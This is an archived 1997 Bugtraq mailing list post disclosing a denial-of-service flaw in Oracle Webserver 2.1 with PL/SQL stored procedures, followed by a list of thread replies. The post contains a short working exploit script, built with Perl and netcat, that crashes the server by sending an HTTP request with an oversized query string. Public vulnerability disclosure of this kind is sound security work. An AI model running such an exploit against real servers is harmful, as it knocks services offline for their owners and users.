Bugtraq mailing list archives
DoS against Oracle Webserver 2.1 with PL/SQL stored procedures
From: jas () PDC KTH SE (Simon Josefsson)
Date: Wed, 23 Jul 1997 00:15:31 +0200
Fellow bugtraqers, I stumpled over this tonight. It's a DoS-attack against a Oracle Webserver 2.1 that serves PL/SQL stored procedures. The server dumps quietly, I haven't found anything in the logs. v2.0 does not seem to exhibit this behaviour (v2.1 is the latest, but many sites seem to still run v2.0). I'm sorry if this is old news (but I'd appreciate of someone told me if there is a bugfix somewhere). (PL/SQL is, simply put, a scripting language within the Oracle database) --- #!/bin/sh # # requires Perl and NetCat. # # usage: # prg <host> <port> <path> # # example: # # ./prg your.own.domain.com 80 /ows-bin # # if you have the PL/SQL stored procedure in /ows-bin/. # perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3"|nc $1 $2 --- S.
Current thread:
- DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Simon Josefsson (Jul 22)
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Stefan Rompf (Jul 23)
- CPSR 7: IRIX WWW Server Corinne Posse Releases (Jul 23)
- Re: CPSR 7: IRIX WWW Server J.A. Gutierrez (Jul 23)
- SGI Security Advisory 19970701-01-PX - talkd Vulnerability SGI Security Coordinator (Jul 23)
- <Possible follow-ups>
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Ross Potts (Jul 23)
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Simon Josefsson (Jul 23)
- Re: DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Matthew G. Harrigan (Jul 23)